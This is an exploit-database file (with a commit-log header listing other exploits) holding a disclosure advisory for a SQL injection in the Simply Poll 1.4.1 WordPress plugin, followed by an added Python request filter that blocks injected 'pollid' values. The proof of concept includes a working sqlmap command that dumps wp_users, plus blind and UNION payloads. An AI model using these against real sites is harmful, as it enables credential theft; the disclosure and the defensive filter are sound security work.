exploit-db-mirror/platforms/php/webapps/40971.txt
Offensive Security f8746c89a4 DB: 2016-12-29
4 new exploits

analogx SimpleServer:WWW 1.0.6 - Directory Traversal
AnalogX SimpleServer:WWW 1.0.6 - Directory Traversal

My PHP Dating - 'success_story.php id' SQL Injection
My PHP Dating - 'id' Parameter SQL Injection

Roundcube 0.3.1 - Cross-Site Request Forgery / SQL Injection
Roundcube Webmail 0.3.1 - Cross-Site Request Forgery / SQL Injection

Roundcube 1.1.3 - Directory Traversal
Roundcube Webmail 1.1.3 - Directory Traversal

PHPMailer 5.2.17 - Remote Code Execution
PHPMailer < 5.2.18 - Remote Code Execution (Bash)
PHPMailer < 5.2.18 - Remote Code Execution (PHP)
PHPMailer < 5.2.20 - Remote Code Execution
WordPress Plugin Simply Poll 1.4.1 - SQL Injection
SwiftMailer < 5.4.5-DEV - Remote Code Execution
2016-12-29 05:01:16 +00:00


# Exploit Title: Simply Poll 1.4.1 Plugin for WordPress - SQL Injection
# Date: 21/12/2016
# Exploit Author: TAD GROUP
# Vendor Homepage: https://wordpress.org/plugins/simply-poll/
# Software Link: https://wordpress.org/plugins/simply-poll/
# Contact: info@tad.bg
# Website: http://tad.bg
# Category: Web Application Exploits
1. Description
An unescaped parameter was found in Simply Poll version 1.4.1 (WP
plugin). An attacker can exploit this vulnerability to read from the
database.
The POST parameter 'pollid' is vulnerable.
2. Proof of Concept
sqlmap -u "http://example.com/wp-admin/admin-ajax.php" \
  --data="action=spAjaxResults&pollid=2" --dump -T wp_users -D wordpress \
  --threads=10 --random-agent --dbms=mysql --level=5 --risk=3

Parameter: pollid (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: action=spAjaxResults&pollid=2 AND 6034=6034

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: action=spAjaxResults&pollid=2 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: action=spAjaxResults&pollid=-7159 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706a7171,0x55746570525a68726d4a6348446579564f524752646c786a5451775272645a6e734b766657534c44,0x7162627171),NULL-- CfNO
3. Attack outcome:
An attacker can read arbitrary data from the database. If the webserver
is misconfigured, read & write access to the filesystem may be possible.
4. Impact:
Critical
5. Affected versions:
<= 1.4.1
6. Disclosure Timeline:
21-Dec-2016 - found the vulnerability
21-Dec-2016 - informed the developer
28-Dec-2016 - release date of this security advisory
Not fixed as of the date this exploit was submitted.
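
Since the advisory reports no vendor fix, one stopgap is a request filter in front of admin-ajax.php that only lets integer poll IDs through. The following is an added example, not part of the advisory or the plugin's code; the function name check_request is hypothetical, and it assumes legitimate poll IDs are short decimal integers.

```python
import re
from urllib.parse import parse_qsl

# Action and parameter names come from the advisory's proof of concept.
ACTION = "spAjaxResults"
PARAM = "pollid"
# Assumption: a legitimate poll ID is a short ASCII decimal integer (the PoC uses 2).
POLL_ID_RE = re.compile(r"[0-9]{1,10}")


def check_request(body: str, query: str = "") -> str:
    """Classify one form-encoded request to admin-ajax.php.

    "ignore": not a Simply Poll results request.
    "allow":  exactly one pollid and it is a plain integer.
    "block":  pollid missing, repeated, empty, or not a plain integer.
    """
    # admin-ajax.php reads the action from $_REQUEST, so the URL query
    # string is inspected together with the POST body.
    raw = parse_qsl(query, keep_blank_values=True) + parse_qsl(body, keep_blank_values=True)
    # PHP ignores leading spaces in parameter names, so normalise them too.
    pairs = [(k.lstrip(" "), v) for k, v in raw]
    if ACTION not in [v for k, v in pairs if k == "action"]:
        return "ignore"
    ids = [v for k, v in pairs if k == PARAM]
    # Require exactly one value: PHP keeps the last duplicate, so a filter
    # that only inspects the first occurrence can be bypassed. Array forms
    # such as "pollid[]" do not match PARAM and are blocked here as missing.
    if len(ids) != 1:
        return "block"
    return "allow" if POLL_ID_RE.fullmatch(ids[0]) else "block"


# Constructed sample bodies; the injected values are the advisory's own payloads.
SAMPLES = [
    "action=spAjaxResults&pollid=2",
    "action=spAjaxResults&pollid=2+AND+6034%3D6034",
    "action=spAjaxResults&pollid=2+AND+SLEEP(5)",
    "action=spAjaxResults&pollid=1&pollid=2+AND+SLEEP(5)",
    "action=heartbeat&interval=15",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(f"{check_request(sample):6}  {sample}")
```

Blocked requests are also worth logging, since a non-integer pollid on this action has no legitimate source.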